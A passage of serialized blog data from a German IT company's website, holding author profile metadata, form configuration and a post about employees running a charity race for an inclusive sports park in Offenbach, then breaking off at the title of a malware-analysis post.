DE",{"type":911,"id":945,"value":946},"inbox_key","gkgab-contact-form",{"type":911,"id":948},"_gotcha",{"type":911,"id":950},"jsonData",[952,955],{"lang":953,"href":954},"en","/en/posts/2026-06-26-frontier-partner",{"lang":956,"href":957},"es","/es/posts/2026-06-26-frontier-partner",{"slick":508,"form":508},"/posts/2026-06-26-frontier-partner",{"title":799,"description":808},"posts/2026-06-26-frontier-partner",[963,964,965],"Award","Microsoft Partner","AI","tLCzUAnMNG47RJlgvquX3YwGkm9VcOsCR-QbrnWl0S4",{"id":968,"extension":969,"meta":970,"stem":7,"__hash__":1312},"authors_data/authors.json","json",{"path":971,"Alexander Schlindwein":972,"Sophie Luna":978,"Nadine Kern":986,"Karsten Kleinschmidt":993,"Julian Wendt":999,"Holger Bunkradt":1004,"Ralf Mania":1010,"Oliver Kieselbach":1016,"Steffen Schwerdtfeger":1022,"Gunnar Winter":1030,"Jan Petersen":1035,"Thorsten Kunzi":1040,"Moritz Pohl":1044,"Thorben Pöschus":1049,"Christoph Hannebauer":1055,"Marco Scheel":1059,"Christopher Brumm":1064,"Florian Klante":1071,"Niklas Bachmann":1076,"Nils Krautkrämer":1081,"Patrick Treptau":1087,"Peter Beckendorf":1092,"Patrick Sobau":1097,"Jörg Wunderlich":1102,"Michael Breither":1106,"Christian Kanja":1111,"Zeba Hoffmann":1117,"Jochen Fröhlich":1122,"Jan Geisbauer":1126,"Gerrit Reinke":1137,"Christian Kordel":1143,"Stephan Wälde":1147,"Carolin Kanja":1152,"Adrian Ritter":1157,"Marvin Bangert":1162,"Thorsten Pickhan":1168,"Christian Lorenz":1174,"Denis Böhm":1179,"Fabian Bader":1184,"Juan Jose Fernandez Perez":1190,"Mahschid Sayyar":1195,"Benjamin Dassow":1200,"Markus Walschburger":1205,"Jonathan Haist":1210,"Daniel Rohregger":1215,"Thomas Naunheim":1220,"Florian Stöckl":1225,"Pascal Asch":1230,"Markus Kättner":1235,"Anna Ulbricht":1242,"Annette Brauns":1249,"body":1256,"title":1311,"Thorben Poeschus":1049,"Nils Krautkraemer":1081,"Joerg Wunderlich":1102,"Jochen Froehlich":1122,"Stephan Waelde":1147,"Denis Boehm":1179,"Florian Stoeckl":1225,"Markus Kaettner":1235},"/authors",{"display_name":973,"avatar":974,"permalink":975,"twitter":976,"linkedin":977},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":979,"avatar":980,"permalink":981,"twitter":982,"linkedin":983,"imageOffsetLeft":984,"imageOffsetTop":985},"Sophie Luna","c_thumb,h_1600,w_1600/people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":987,"avatar":988,"permalink":989,"twitter":990,"linkedin":991,"imageOffsetTop":992},"Nadine Kern","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","72%",{"display_name":994,"avatar":995,"permalink":996,"twitter":997,"linkedin":998},"Karsten Kleinschmidt","people/people-karsten-kleinschmidt.png","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt",{"display_name":1000,"avatar":1001,"permalink":1002,"linkedin":1003},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":1005,"avatar":1006,"permalink":1007,"linkedin":1008,"twitter":1009},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":1011,"avatar":1012,"permalink":1013,"linkedin":1014,"twitter":1015},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":1017,"avatar":1018,"permalink":1019,"linkedin":1020,"twitter":1021},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":1023,"avatar":1024,"permalink":1025,"linkedin":1026,"twitter":1027,"imageOffsetTop":1028,"imageOffsetLeft":1029},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":1031,"avatar":1032,"permalink":1033,"twitter":982,"linkedin":1034},"Gunnar Winter","c_thumb,h_1600,w_1600/people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":1036,"avatar":1037,"permalink":1038,"twitter":982,"linkedin":1039},"Jan Petersen","c_thumb,h_1600,w_1600/people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":1041,"avatar":1042,"permalink":1043,"twitter":982,"linkedin":1034,"imageOffsetTop":992},"Thorsten Kunzi","c_thumb,h_1600,w_1600/people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":1045,"avatar":1046,"permalink":1047,"twitter":982,"linkedin":1048},"Dr. Moritz Pohl","c_thumb,h_1600,w_1600/people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":1050,"avatar":1051,"permalink":1052,"twitter":1053,"linkedin":1054},"Thorben Pöschus","c_thumb,h_1600,w_1600/people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":1056,"avatar":1057,"permalink":1058,"twitter":982,"linkedin":1034,"imageOffsetTop":992},"Dr. Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":1060,"avatar":1061,"permalink":1062,"twitter":1063,"linkedin":1063},"Marco Scheel","c_thumb,h_1600,w_1600/people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":1065,"avatar":1066,"permalink":1067,"twitter":1068,"linkedin":1069,"imageOffsetTop":1070},"Christopher Brumm","c_thumb,h_1600,w_1600/people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":1072,"avatar":1073,"permalink":1074,"linkedin":1075,"twitter":982},"Florian Klante","c_thumb,h_1600,w_1600/people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":1077,"avatar":1078,"permalink":1079,"linkedin":1080,"twitter":982},"Niklas Bachmann","c_thumb,h_1600,w_1600/people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":1082,"avatar":1083,"permalink":1084,"twitter":1085,"linkedin":1086},"Nils Krautkrämer","c_thumb,h_1600,w_1600/people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":1088,"avatar":1089,"permalink":1090,"linkedin":1091,"twitter":982},"Patrick Treptau","c_thumb,h_1600,w_1600/people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":1093,"avatar":1094,"permalink":1095,"linkedin":1096,"twitter":982,"imageOffsetTop":992},"Peter Beckendorf","c_thumb,h_1600,w_1600/people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":1098,"avatar":1099,"permalink":1100,"linkedin":1101,"twitter":982},"Patrick Sobau","c_thumb,h_1600,w_1600/people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":1103,"avatar":1104,"permalink":1105,"twitter":982},"Jörg Wunderlich","c_thumb,h_1600,w_1600/people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":1107,"avatar":1108,"permalink":1109,"twitter":982,"linkedin":1110},"Michael Breither","c_thumb,h_1600,w_1600/people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":1112,"avatar":1113,"permalink":1114,"twitter":1115,"linkedin":1116},"Christian Kanja","c_thumb,h_1600,w_1600/people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":1118,"avatar":1119,"permalink":1120,"linkedin":1121,"twitter":982},"Zeba Hoffmann","c_thumb,h_1600,w_1600/people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":1123,"avatar":1124,"permalink":1125,"twitter":982,"linkedin":1034},"Jochen Fröhlich","c_thumb,h_1600,w_1600/people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":1127,"avatar":1128,"permalink":1129,"twitter":1130,"linkedin":1130,"imageOffsetTop":992,"socials":1131},"Jan Geisbauer","c_thumb,h_1600,w_1600/people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[1132,1134],{"text":728,"href":1133},"https://emptydc.com",{"text":1135,"href":1136},"Podcast","https://hairlessinthecloud.com",{"display_name":1138,"avatar":1139,"permalink":1140,"twitter":1141,"linkedin":1142},"Gerrit Reinke","c_thumb,h_1600,w_1600/people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":1144,"avatar":1145,"permalink":1146,"twitter":982,"linkedin":1034},"Christian Kordel","c_thumb,h_1600,w_1600/people/christian-kordel.png","/authors/christian-kordel",{"display_name":1148,"avatar":1149,"permalink":1150,"twitter":1151,"linkedin":1034},"Stephan Wälde","c_thumb,h_1600,w_1600/people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":801,"avatar":1153,"permalink":1154,"twitter":1155,"linkedin":1156},"c_thumb,h_1600,w_1600/people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":1158,"avatar":1159,"permalink":1160,"twitter":1161,"linkedin":1161},"Adrian Ritter","c_thumb,h_1600,w_1600/people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":1163,"avatar":1164,"permalink":1165,"twitter":1166,"linkedin":1167},"Marvin Bangert","c_thumb,h_1600,w_1600/people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":1169,"avatar":1170,"permalink":1171,"twitter":1172,"linkedin":1173},"Thorsten Pickhan","c_thumb,h_1600,w_1600/people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":1175,"avatar":1176,"permalink":1177,"linkedin":1178,"twitter":982},"Christian Lorenz","c_thumb,h_1600,w_1600/people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":1180,"avatar":1181,"permalink":1182,"linkedin":1183,"twitter":982},"Denis Böhm","c_thumb,h_1600,w_1600/people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":1185,"avatar":1186,"permalink":1187,"linkedin":1188,"twitter":1189},"Fabian Bader","c_thumb,h_1600,w_1600/people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":1191,"avatar":1192,"permalink":1193,"linkedin":1194},"Juan Jose Fernandez Perez","c_thumb,h_1600,w_1600/people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":1196,"avatar":1197,"permalink":1198,"linkedin":1199},"Mahschid Sayyar","c_thumb,h_1600,w_1600/people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":1201,"avatar":1202,"permalink":1203,"linkedin":1204},"Benjamin Dassow","c_thumb,h_1600,w_1600/people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":1206,"avatar":1207,"permalink":1208,"linkedin":1209},"Markus Walschburger","c_thumb,h_1600,w_1600/people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":1211,"avatar":1212,"permalink":1213,"linkedin":1214,"imageOffsetTop":992},"Jonathan Haist","c_thumb,h_1600,w_1600/people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":1216,"avatar":1217,"permalink":1218,"linkedin":1219,"imageOffsetTop":992},"Daniel Rohregger","c_thumb,h_1600,w_1600/people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":1221,"avatar":1222,"permalink":1223,"linkedin":1224,"imageOffsetTop":1070},"Thomas Naunheim","c_thumb,h_1600,w_1600/people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":1226,"avatar":1227,"permalink":1228,"linkedin":1229,"imageOffsetTop":1070},"Florian Stöckl","c_thumb,h_1600,w_1600/people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":1231,"avatar":1232,"permalink":1233,"linkedin":1234,"imageOffsetTop":1070},"Pascal Asch","c_thumb,h_1600,w_1600/people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":1236,"avatar":1237,"permalink":1238,"linkedin":1239,"imageOffsetTop":1240,"imageOffsetLeft":1241},"Markus Kättner","c_thumb,h_1600,w_1600/people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":1243,"avatar":1244,"permalink":1245,"linkedin":1246,"imageOffsetTop":1247,"imageOffsetLeft":1248},"Anna Ulbricht","c_thumb,h_1600,w_1600/people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"display_name":1250,"avatar":1251,"permalink":1252,"linkedin":1253,"imageOffsetTop":1254,"imageOffsetLeft":1255},"Annette Brauns","c_thumb,h_2000,w_1200/people/Annette-Brauns-8.jpg","/authors/annette-brauns","annette-brauns","95%","60%",{"Alexander Schlindwein":1257,"Sophie Luna":1258,"Nadine Kern":1259,"Karsten Kleinschmidt":1260,"Julian Wendt":1261,"Holger Bunkradt":1262,"Ralf Mania":1263,"Oliver Kieselbach":1264,"Steffen Schwerdtfeger":1265,"Gunnar Winter":1266,"Jan Petersen":1267,"Thorsten Kunzi":1268,"Moritz Pohl":1269,"Thorben Pöschus":1270,"Christoph Hannebauer":1271,"Marco Scheel":1272,"Christopher Brumm":1273,"Florian Klante":1274,"Niklas Bachmann":1275,"Nils Krautkrämer":1276,"Patrick Treptau":1277,"Peter Beckendorf":1278,"Patrick Sobau":1279,"Jörg Wunderlich":1280,"Michael Breither":1281,"Christian Kanja":1282,"Zeba Hoffmann":1283,"Jochen Fröhlich":1284,"Jan Geisbauer":1285,"Gerrit Reinke":1289,"Christian Kordel":1290,"Stephan Wälde":1291,"Carolin Kanja":1292,"Adrian Ritter":1293,"Marvin Bangert":1294,"Thorsten Pickhan":1295,"Christian Lorenz":1296,"Denis Böhm":1297,"Fabian Bader":1298,"Juan Jose Fernandez Perez":1299,"Mahschid Sayyar":1300,"Benjamin Dassow":1301,"Markus Walschburger":1302,"Jonathan Haist":1303,"Daniel Rohregger":1304,"Thomas Naunheim":1305,"Florian Stöckl":1306,"Pascal Asch":1307,"Markus Kättner":1308,"Anna Ulbricht":1309,"Annette Brauns":1310},{"display_name":973,"avatar":974,"permalink":975,"twitter":976,"linkedin":977},{"display_name":979,"avatar":980,"permalink":981,"twitter":982,"linkedin":983,"imageOffsetLeft":984,"imageOffsetTop":985},{"display_name":987,"avatar":988,"permalink":989,"twitter":990,"linkedin":991,"imageOffsetTop":992},{"display_name":994,"avatar":995,"permalink":996,"twitter":997,"linkedin":998},{"display_name":1000,"avatar":1001,"permalink":1002,"linkedin":1003},{"display_name":1005,"avatar":1006,"permalink":1007,"linkedin":1008,"twitter":1009},{"display_name":1011,"avatar":1012,"permalink":1013,"linkedin":1014,"twitter":1015},{"display_name":1017,"avatar":1018,"permalink":1019,"linkedin":1020,"twitter":1021},{"display_name":1023,"avatar":1024,"permalink":1025,"linkedin":1026,"twitter":1027,"imageOffsetTop":1028,"imageOffsetLeft":1029},{"display_name":1031,"avatar":1032,"permalink":1033,"twitter":982,"linkedin":1034},{"display_name":1036,"avatar":1037,"permalink":1038,"twitter":982,"linkedin":1039},{"display_name":1041,"avatar":1042,"permalink":1043,"twitter":982,"linkedin":1034,"imageOffsetTop":992},{"display_name":1045,"avatar":1046,"permalink":1047,"twitter":982,"linkedin":1048},{"display_name":1050,"avatar":1051,"permalink":1052,"twitter":1053,"linkedin":1054},{"display_name":1056,"avatar":1057,"permalink":1058,"twitter":982,"linkedin":1034,"imageOffsetTop":992},{"display_name":1060,"avatar":1061,"permalink":1062,"twitter":1063,"linkedin":1063},{"display_name":1065,"avatar":1066,"permalink":1067,"twitter":1068,"linkedin":1069,"imageOffsetTop":1070},{"display_name":1072,"avatar":1073,"permalink":1074,"linkedin":1075,"twitter":982},{"display_name":1077,"avatar":1078,"permalink":1079,"linkedin":1080,"twitter":982},{"display_name":1082,"avatar":1083,"permalink":1084,"twitter":1085,"linkedin":1086},{"display_name":1088,"avatar":1089,"permalink":1090,"linkedin":1091,"twitter":982},{"display_name":1093,"avatar":1094,"permalink":1095,"linkedin":1096,"twitter":982,"imageOffsetTop":992},{"display_name":1098,"avatar":1099,"permalink":1100,"linkedin":1101,"twitter":982},{"display_name":1103,"avatar":1104,"permalink":1105,"twitter":982},{"display_name":1107,"avatar":1108,"permalink":1109,"twitter":982,"linkedin":1110},{"display_name":1112,"avatar":1113,"permalink":1114,"twitter":1115,"linkedin":1116},{"display_name":1118,"avatar":1119,"permalink":1120,"linkedin":1121,"twitter":982},{"display_name":1123,"avatar":1124,"permalink":1125,"twitter":982,"linkedin":1034},{"display_name":1127,"avatar":1128,"permalink":1129,"twitter":1130,"linkedin":1130,"imageOffsetTop":992,"socials":1286},[1287,1288],{"text":728,"href":1133},{"text":1135,"href":1136},{"display_name":1138,"avatar":1139,"permalink":1140,"twitter":1141,"linkedin":1142},{"display_name":1144,"avatar":1145,"permalink":1146,"twitter":982,"linkedin":1034},{"display_name":1148,"avatar":1149,"permalink":1150,"twitter":1151,"linkedin":1034},{"display_name":801,"avatar":1153,"permalink":1154,"twitter":1155,"linkedin":1156},{"display_name":1158,"avatar":1159,"permalink":1160,"twitter":1161,"linkedin":1161},{"display_name":1163,"avatar":1164,"permalink":1165,"twitter":1166,"linkedin":1167},{"display_name":1169,"avatar":1170,"permalink":1171,"twitter":1172,"linkedin":1173},{"display_name":1175,"avatar":1176,"permalink":1177,"linkedin":1178,"twitter":982},{"display_name":1180,"avatar":1181,"permalink":1182,"linkedin":1183,"twitter":982},{"display_name":1185,"avatar":1186,"permalink":1187,"linkedin":1188,"twitter":1189},{"display_name":1191,"avatar":1192,"permalink":1193,"linkedin":1194},{"display_name":1196,"avatar":1197,"permalink":1198,"linkedin":1199},{"display_name":1201,"avatar":1202,"permalink":1203,"linkedin":1204},{"display_name":1206,"avatar":1207,"permalink":1208,"linkedin":1209},{"display_name":1211,"avatar":1212,"permalink":1213,"linkedin":1214,"imageOffsetTop":992},{"display_name":1216,"avatar":1217,"permalink":1218,"linkedin":1219,"imageOffsetTop":992},{"display_name":1221,"avatar":1222,"permalink":1223,"linkedin":1224,"imageOffsetTop":1070},{"display_name":1226,"avatar":1227,"permalink":1228,"linkedin":1229,"imageOffsetTop":1070},{"display_name":1231,"avatar":1232,"permalink":1233,"linkedin":1234,"imageOffsetTop":1070},{"display_name":1236,"avatar":1237,"permalink":1238,"linkedin":1239,"imageOffsetTop":1240,"imageOffsetLeft":1241},{"display_name":1243,"avatar":1244,"permalink":1245,"linkedin":1246,"imageOffsetTop":1247,"imageOffsetLeft":1248},{"display_name":1250,"avatar":1251,"permalink":1252,"linkedin":1253,"imageOffsetTop":1254,"imageOffsetLeft":1255},"Authors","v4BFjFTsIGK6QfYDKS1bZ8NqfUrV_WCoMMRwyN5uv8c",[1314,1388,1492,3715,3951,4263,4326,5020,5506,6328,6453,6588,19044,19289,19443,19550,19630,19858,19978,20068,20736],{"id":798,"title":799,"author":1315,"body":1316,"cta":764,"description":808,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":1359,"moment":874,"navigation":508,"path":959,"seo":1386,"stem":961,"tags":1387,"webcast":749,"__hash__":966},[801],{"type":803,"value":1317,"toc":1354},[1318,1320,1322,1324,1326,1328,1330,1332,1346,1348,1350,1352],[806,1319,808],{},[810,1321,813],{"id":812},[806,1323,816],{},[806,1325,819],{},[810,1327,823],{"id":822},[806,1329,816],{},[806,1331,828],{},[806,1333,831,1334,835,1336,838,1338,835,1340,843,1342,846,1344,849],{},[833,1335,131],{"href":132},[833,1337,45],{"href":46},[833,1339,299],{"href":300},[833,1341,322],{"href":323},[833,1343,394],{"href":395},[833,1345,475],{"href":476},[806,1347,852],{},[810,1349,856],{"id":855},[806,1351,816],{},[806,1353,861],{},{"title":863,"searchDepth":864,"depth":864,"links":1355},[1356,1357,1358],{"id":812,"depth":864,"text":813},{"id":822,"depth":864,"text":823},{"id":855,"depth":864,"text":856},{"lang":4,"seoTitle":872,"titleClass":873,"date":874,"categories":1360,"blogtitlepic":877,"socialimg":878,"customExcerpt":879,"keywords":880,"contactInContent":1361,"hreflang":1382,"published":508,"scripts":1385},[876],{"quote":508,"infos":1362},{"bgColor":883,"color":884,"boxBgColor":761,"boxColor":884,"headline":885,"subline":886,"level":810,"textStyling":887,"flush":888,"person":1363,"form":1367},{"image":890,"cloudinary":508,"alt":891,"name":892,"quotee":892,"quoteeTitle":893,"quote":894,"detailsHeader":895,"details":1364},[1365,1366],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":905,"cta":1368,"method":870,"action":908,"fields":1369},{"skin":907},[1370,1371,1372,1373,1374,1375,1376,1377,1378,1379,1380,1381],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":918},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":921},{"label":923,"type":924,"id":924,"required":508,"requiredMsg":925},{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":932,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":876},{"type":911,"id":939,"value":940},{"type":911,"id":942,"value":943},{"type":911,"id":945,"value":946},{"type":911,"id":948},{"type":911,"id":950},[1383,1384],{"lang":953,"href":954},{"lang":956,"href":957},{"slick":508,"form":508},{"title":799,"description":808},[963,964,965],{"id":1389,"title":1390,"author":1391,"body":1392,"cta":764,"description":1396,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":1464,"moment":1466,"navigation":508,"path":1484,"seo":1485,"stem":1486,"tags":1487,"webcast":749,"__hash__":1491},"content_de/posts/2026-06-09-vair-run.md","160 Kilometer für den guten Zweck",[1250],{"type":803,"value":1393,"toc":1459},[1394,1397,1401,1403,1413,1417,1419,1428,1431,1437,1441,1443,1446,1453,1456],[806,1395,1396],{},"Sonntagmorgen, 8:30 Uhr, Holbeinsteg am Main. Elf Kolleginnen und Kollegen in einheitlichen NinjaCat-Shirts, bereit für die Frankfurter Runden. Regen, Blitz und Donner inklusive. Für einen guten Zweck zu laufen war Motivation genug, um trotz des schlechten Wetters die Laufschuhe zu schnüren.",[810,1398,1400],{"id":1399},"frankfurt-läuft-und-läuft-und-läuft","Frankfurt läuft. Und läuft. Und läuft.",[806,1402,816],{},[806,1404,1405,1406,1412],{},"Die Frankfurter Runden sind ein Breitensport-Event auf einer 10 Kilometer langen Laufstrecke am Mainufer, vorbei an der EZB und dem Hafenpark, mit der Frankfurter Skyline im Blick. Das Besondere: Wer antritt, entscheidet erst im Rennen, wie oft er die Runde dreht. Ein bis vier Runden, also 10 bis 40 Kilometer. Nach jeder absolvierten Runde die freie Wahl: weiterlaufen oder ins Ziel abbiegen. glueckkanja hat den Mitarbeitenden noch einen zusätzlichen Antrieb gesetzt: Pro gelaufene Runde spendet glueckkanja an den ",[833,1407,1411],{"href":1408,"rel":1409},"https://vairein.de/",[1410],"nofollow","VAIR e.V."," in Offenbach und speziell an das Projekt Vairplay.",[810,1414,1416],{"id":1415},"ein-park-für-alle-mitten-in-offenbach","Ein Park für alle, mitten in Offenbach",[806,1418,816],{},[806,1420,1421,1422,1427],{},"Der VAIR e.V. baut unter der Kaiserleibrücke mit ",[833,1423,1426],{"href":1424,"rel":1425},"https://www.vairplay-of.de/",[1410],"Vairplay"," den ersten öffentlichen inklusiven Sport- und Kulturpark der Stadt. Auf einer bisher brachliegenden Fläche von rund 10.000 Quadratmetern soll ein Ort entstehen, der Sport, Bewegung und Kultur zusammenbringt, barrierefrei, offen für alle Altersgruppen und mit Tribünenbühnen für Veranstaltungen.",[806,1429,1430],{},"Zijad Doličanin, Vorstandsvorsitzender des VAIR e.V., sieht darin einen Raum, in dem Menschen zusammenkommen, sich austauschen und Gemeinschaft erleben können, soziale und kulturelle Grenzen überwunden werden und der Zusammenhalt in der Region wächst. Ein Treffpunkt für eine Stadt, die für ihr buntes Miteinander bekannt ist. glueckkanja ist durch und durch ein Offenbacher Unternehmen, hier hat alles angefangen, viele Kolleginnen und Kollegen kommen aus der Region, und soziales Engagement fängt für uns dort an, wo wir verwurzelt sind.",[1432,1433],"quotes",{":quotes":1434,":no-fullscreen":1435,"spacing":1436},"quoteZijad","true","mb-10",[810,1438,1440],{"id":1439},"_16-runden-eine-siegerehrung-und-viel-jubel","16 Runden, eine Siegerehrung und viel Jubel",[806,1442,816],{},[806,1444,1445],{},"Kurz nach dem Start zog die erste Gewitterfront über Frankfurt. Dicke Regentropfen, Blitz, Donner, etwas Wind dazu. Auf der Strecke kam kurz die Frage auf, ob die Veranstaltung wohl abgebrochen wird. Wird sie nicht. Also weiter. Die Zuschauer am Mainufer haben trotz des Wetters durchgehend angefeuert, genau die richtige Motivation, wenn man nass und in der zweiten Runde ist.",[806,1447,1448],{},[1449,1450],"img",{"alt":1451,"src":1452},"Frankfurter Runden mit unserer NinjaCat","https://res.cloudinary.com/c4a8/image/upload/blog/pics/frankfurter-runden.jpg",[806,1454,1455],{},"Angefeuert haben sich aber auch die GKler gegenseitig, und das hat sich ausgezahlt. Insgesamt hat das Team an diesem Morgen 16 Runden absolviert. Acht Kolleginnen und Kollegen haben eine Runde gedreht, zwei haben sich für zwei Runden entschieden. Und dann war da noch Lisa, die nach der ersten Runde einfach weitergelaufen ist. Und nach der zweiten auch. 30 Kilometer, Zeit 2:18:50, zweiter Platz Gesamtwertung der Frauen, erster Platz in der Altersklasse. Das Team hat bis zur letzten Sekunde lautstark zugejubelt und auch während der Siegerehrung nicht aufgehört.",[806,1457,1458],{},"160 Kilometer sind an diesem Morgen zusammengekommen, einer nach dem anderen, im Regen, und jeder davon fließt in einen Park, den es in Offenbach noch nicht gibt. 2027 läuft das Team wieder, vielleicht bei besserem Wetter, vielleicht auch nicht.",{"title":863,"searchDepth":864,"depth":864,"links":1460},[1461,1462,1463],{"id":1399,"depth":864,"text":1400},{"id":1415,"depth":864,"text":1416},{"id":1439,"depth":864,"text":1440},{"lang":4,"seoTitle":1465,"titleClass":873,"date":1466,"categories":1467,"blogtitlepic":1468,"socialimg":1469,"customExcerpt":1470,"keywords":1471,"hreflang":1472,"scripts":1477,"quoteZijad":1478},"Frankfurter Runden 2026: glueckkanja läuft 160 Kilometer für den VAIR e.V. Offenbach","2026-06-08",[876],"frankfurter-runden.png","/heads/frankfurter-runden.png","Elf Kollegen und Kolleginnen, 16 Runden, 160 Kilometer, ein Gewittersturm und eine Podiumsplatzierung: glueckkanja war bei den Frankfurter Runden 2026 dabei und hat für jede gelaufene Runde an den VAIR e.V. gespendet, der in Offenbach einen inklusiven Sport- und Kulturpark baut.","Frankfurter Runden, Spendenlauf Frankfurt, CSR IT Unternehmen, soziales Engagement Offenbach, Teambuilding Offenbach, Top Arbeitgeber Rhein-Main, Vairein Offenbach, VAIR e.V. Offenbach, Vairplay Offenbach, glueckkanja Offenbach, Employer Branding IT, Unternehmenskultur IT, IT Unternehmen Offenbach, Breitensport Frankfurt, inklusiver Park Offenbach, Arbeiten bei glueckkanja",[1473,1475],{"lang":953,"href":1474},"/en/posts/2026-06-09-vair-run",{"lang":956,"href":1476},"/es/posts/2026-06-09-vair-run",{"slick":508,"form":508},{"items":1479},[1480],{"text":1481,"name":1482,"company":1483,"alt":1482},"Das Engagement lokaler Unternehmen ist ein wichtiges Signal für gesellschaftliche Verantwortung und gelebte Verbundenheit mit der Region. Solche Partnerschaften ermöglichen nachhaltige Projekte, schaffen Mehrwert für die Gemeinschaft und zeigen, was gemeinsam erreicht werden kann.","Zijad Doličanin","Vorstandsvorsitzender VAIR e.V.","/posts/2026-06-09-vair-run",{"title":1390,"description":1396},"posts/2026-06-09-vair-run",[1488,1489,1490],"Top Arbeitgeber","Employer Branding","Soziales Engagement","ypJGo0Qw7bpAGnq3ARgHfzPwoqUcozeNL2NQSAadkbQ",{"id":1493,"title":1494,"author":1495,"body":1496,"cta":764,"description":1500,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":3643,"moment":3645,"navigation":508,"path":3705,"seo":3706,"stem":3707,"tags":3708,"webcast":749,"__hash__":3714},"content_de/posts/2026-04-10-incident-to-intelligence.md","Anatomie eines unbekannten AMOS Stealers: Vom Alert zur Immunität in 